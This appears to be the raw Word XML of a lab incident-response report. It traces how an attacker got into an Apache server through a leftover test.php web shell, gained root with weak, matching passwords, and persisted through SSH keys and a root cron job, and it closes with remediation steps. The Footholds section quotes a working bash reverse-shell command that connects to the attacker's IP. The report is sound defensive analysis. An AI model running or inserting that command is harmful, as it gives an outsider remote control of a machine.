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D8BE" w14:textId="134CDC12" w:rsidR="00A10484" w:rsidRDefault="00F96FD2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Victim Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E997EA" w14:textId="281AA349" w:rsidR="00855982" w:rsidRPr="00855982" w:rsidRDefault="00A91D7F" w:rsidP="00855982">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A75753" w14:textId="7D95ED3D" w:rsidR="00493418" w:rsidRDefault="00493418" w:rsidP="00E552B9">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial access was gained </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r>
        <w:t>September 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00493418">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a vulnerable website hosted on Apache2. The hosted directory, /var/www/html contained the file “test.php,” with code that allowed command execution from the browser search bar. </w:t>
      </w:r>
      <w:r>
        <w:t>Judging by the name, and date of creation (September 18</w:t>
      </w:r>
      <w:r w:rsidRPr="003B1A09">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>), this was leftover from server testing that the administrator forgot to delete.</w:t>
      </w:r>
      <w:r w:rsidR="00E552B9">
        <w:t xml:space="preserve"> This allowed for directory enumeration, and some system-reconfiguration by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD0243" w14:textId="6E76F177" w:rsidR="00A91D7F" w:rsidRPr="00855982" w:rsidRDefault="00A91D7F" w:rsidP="00A91D7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780100C2" w14:textId="77777777" w:rsidR="00EC5907" w:rsidRDefault="00162585" w:rsidP="00855982">
      <w:r>
        <w:tab/>
        <w:t>After gaining initial access via apache2, the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> set up </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00091E49">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> nc connection on the </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>victim's</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> machine. With this</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> they probably executed some commands. After setting the connection up</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve">they had access to the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/etc/passwd file. From here, they could figure out that the primary user on the system was tm. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71488C" w14:textId="77777777" w:rsidR="00EC5907" w:rsidRDefault="008740E4" w:rsidP="00EC5907">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To get more information on the system ssh server, the attacker accessed files in the /root/.ssh directory and viewed several files. </w:t>
      </w:r>
      <w:r w:rsidR="00FC056F">
        <w:t xml:space="preserve">With the /etc/ssh/sshd_config PermitRootLogin set to yes, the attacker made several attempts to </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>log in</w:t>
      </w:r>
      <w:r w:rsidR="00FC056F">
        <w:t xml:space="preserve"> via SSH</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve"> as root</w:t>
      </w:r>
      <w:r w:rsidR="00FC056F">
        <w:t>. For a while after that</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FC056F">
        <w:t xml:space="preserve"> the attacker </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tested </w:t>
      </w:r>
      <w:r w:rsidR="00FC056F">
        <w:t>ssh passwords for root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DB211" w14:textId="1CA040EC" w:rsidR="00A91D7F" w:rsidRDefault="00FC056F" w:rsidP="00EC5907">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve"> probably</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> didn’t take long to realize that the username and password for “tm” were the same, and from there the attacker probably guessed it was the same password to su as root, then gain root </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access.</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve"> The attacker might have also chosen to attack the memory vulnerability in the version of pkexec on the victim system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2571E65D" w14:textId="1A5F181C" w:rsidR="00A91D7F" w:rsidRDefault="00A91D7F" w:rsidP="00A91D7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Footholds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA2048" w14:textId="12553AE9" w:rsidR="00A91D7F" w:rsidRDefault="00FC056F" w:rsidP="00EC5907">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>The primary foothold in the system is a malicious cron job. After gaining root access, the attacker places the bash script, `bash -I &gt;&amp; /dev/</w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/10.0.3.151/9999 0&gt;&amp;1`. This is a reverse shell that </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send stdout of the shell to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attacker, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> receive and execute commands sent by the attacker. Since it is a reverse backdoor, it should be harder for security to detect.</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> This job runs hourly.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t>According to auth logs, the attacker also set up public key authentication to the victim for persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E460B" w14:textId="7992D6CD" w:rsidR="00A91D7F" w:rsidRDefault="00A91D7F" w:rsidP="00A91D7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Timeline of Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80D281" w14:textId="74B013AD" w:rsidR="00A91D7F" w:rsidRDefault="00EC5907" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> at IP address 10.0.3.151 identifies the apache2 server running on the victim system </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve">makes </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve">first request at 11:51 </w:t>
      </w:r>
      <w:r>
        <w:t>a.m.</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> September </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00091E49">
        <w:t>20th</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E35B6AD" w14:textId="0C835313" w:rsidR="00091E49" w:rsidRDefault="00EC5907" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker</w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve"> interacts with the webpage briefly </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00091E49">
        <w:t xml:space="preserve">then uses the test.php file to start executing commands at 11:52 </w:t>
      </w:r>
      <w:r>
        <w:t>a.m</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve">. The attacker sets up a </w:t>
      </w:r>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> server to execute commands more conveniently. </w:t>
      </w:r>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> several other instances</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> they repeat variations of the initial nc command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049B65F" w14:textId="70F96BE1" w:rsidR="00091E49" w:rsidRDefault="00091E49" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">How did the attacker know test.php would allow for running commands? Guessing seems like a stretch, and </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Apache directory listing doesn’t seem to be enabled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE8057" w14:textId="7884FA57" w:rsidR="008740E4" w:rsidRDefault="00091E49" w:rsidP="008740E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logs did not show requests that might be associated with some sort of </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>directory-finding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack. </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>It's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> almost as if the attacker knew the system…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAAA7D8" w14:textId="75B9C220" w:rsidR="008740E4" w:rsidRDefault="008740E4" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using the webshell, the attacker begins looking at /root/.ssh files, and begins making ssh login attempts as root at 11:54 am</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1CA39" w14:textId="567A8BBB" w:rsidR="00091E49" w:rsidRDefault="008740E4" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At some point the attacker probably figures out that tm’s password is tm. From there they also figure out that the root password is also tm. The first root login over </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is recorded at 12:13 pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B310CFB" w14:textId="17DB50E6" w:rsidR="008740E4" w:rsidRDefault="008740E4" w:rsidP="008740E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Alternatively</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the attacker could have used </w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t xml:space="preserve">known </w:t>
      </w:r>
      <w:r>
        <w:t>memory vulnerabilities in pkexec</w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t xml:space="preserve">. Since the attacker had access to </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>TM's</w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t xml:space="preserve"> home folder by this point, they also would have had access to the </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>Linpeas</w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t xml:space="preserve"> report, making it an easy vulnerability to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F31BA3">
        <w:t>identify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ED5903A" w14:textId="679753A2" w:rsidR="00F31BA3" w:rsidRDefault="00EC5907" w:rsidP="008740E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The same</w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t xml:space="preserve"> goes for all 3 other</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities Linpeas detected</w:t>
      </w:r>
      <w:r w:rsidR="00F31BA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F149C" w14:textId="60FDF121" w:rsidR="008740E4" w:rsidRDefault="00EC5907" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> configures public key authentication </w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve">victim. </w:t>
      </w:r>
      <w:r>
        <w:t>The first</w:t>
      </w:r>
      <w:r w:rsidR="008740E4">
        <w:t xml:space="preserve"> login via public key is recorded at 12:17 pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B834E9" w14:textId="6EFF0AEF" w:rsidR="008740E4" w:rsidRDefault="00F31BA3" w:rsidP="00091E49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At 12:27 </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>p.m.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the attacker sets up the malicious cron job to provide </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>reverse backdoor via netcat in /var/spool/cron/crontabs/root to run every hour. Full root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9BBEB" w14:textId="0CF5D0A9" w:rsidR="00A91D7F" w:rsidRPr="00855982" w:rsidRDefault="00A91D7F" w:rsidP="00A91D7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD26C5E" w14:textId="50D0C2E4" w:rsidR="00EC5907" w:rsidRDefault="00EC5907" w:rsidP="00EC5907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get rid of the malicious cron </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>job</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D678EAF" w14:textId="79146E25" w:rsidR="00A91D7F" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable root access via </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SSH</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37F8BB9D" w14:textId="6CBD878A" w:rsidR="00F31BA3" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get rid of the ‘test.php’ web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="585CD356" w14:textId="4953525C" w:rsidR="00F31BA3" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">better password policy, no more matching of usernames and passwords, and much stronger root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B7CC6A4" w14:textId="3E05A2C8" w:rsidR="00F31BA3" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reduce the number of SUID binaries on the system, get rid of pkexec, or update it to a new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E8CCE0D" w14:textId="73D192D2" w:rsidR="00F31BA3" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>updated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21D1260D" w14:textId="60954DA7" w:rsidR="00F31BA3" w:rsidRPr="00A91D7F" w:rsidRDefault="00F31BA3" w:rsidP="00F31BA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Require </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be done via keys to prevent </w:t>
      </w:r>
      <w:r w:rsidR="00EC5907">
        <w:t>password-guessing.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F31BA3" w:rsidRPr="00A91D7F"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385D" w14:textId="77777777" w:rsidR="009F15D0" w:rsidRDefault="009F15D0" w:rsidP="00855982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A1636A3" w14:textId="77777777" w:rsidR="009F15D0" w:rsidRDefault="009F15D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3DD616EB"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04E9" w14:textId="77777777" w:rsidR="009F15D0" w:rsidRDefault="009F15D0" w:rsidP="00855982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6827D040" w14:textId="77777777" w:rsidR="009F15D0" w:rsidRDefault="009F15D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7913F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0928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C68F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F16F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778555">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="6394592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3599859">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2055806163">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1372026993">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="204872076">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1990598981">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="785126441">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="359941204">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="507714094">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="521014640">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1056663658">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="558513760">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1298954806">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1088624882">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="789860108">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="829253082">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1297566907">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1597593343">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="427770010">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1448162441">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="50464488">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1913469262">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="72237906">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1572539239">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="812720506">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="604659590">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2125076048">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="473835557">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1427536494">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="9970767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7F"/>
    <w:rsid w:val="00091E49"/>
    <w:rsid w:val="00162585"/>
    <w:rsid w:val="001D4362"/>
    <w:rsid w:val="00303CBA"/>
    <w:rsid w:val="0036321F"/>
    <w:rsid w:val="003B1A09"/>
    <w:rsid w:val="00493418"/>
    <w:rsid w:val="007833A7"/>
    <w:rsid w:val="00855982"/>
    <w:rsid w:val="008740E4"/>
    <w:rsid w:val="00937B5E"/>
    <w:rsid w:val="009F15D0"/>
    <w:rsid w:val="00A10484"/>
    <w:rsid w:val="00A91D7F"/>
    <w:rsid w:val="00AA7DB9"/>
    <w:rsid w:val="00E552B9"/>
    <w:rsid w:val="00EC5907"/>
    <w:rsid w:val="00F31BA3"/>
    <w:rsid w:val="00F96FD2"/>
    <w:rsid w:val="00FC05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6773"/>
  <w15:docId w15:val="{9FE74A06-CD70-457B-BD1D-AE59D6A7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9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32582">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1682005776">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="742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115">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2126531804">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="5553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y3\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382</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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Ray</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2023-09-23T00:57:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-22T16:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-23T00:58:00Z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0d28bef3-f07e-43c6-83ae-8951b5fd733c</vt:lpwstr>
  </property>
</Properties>
</file>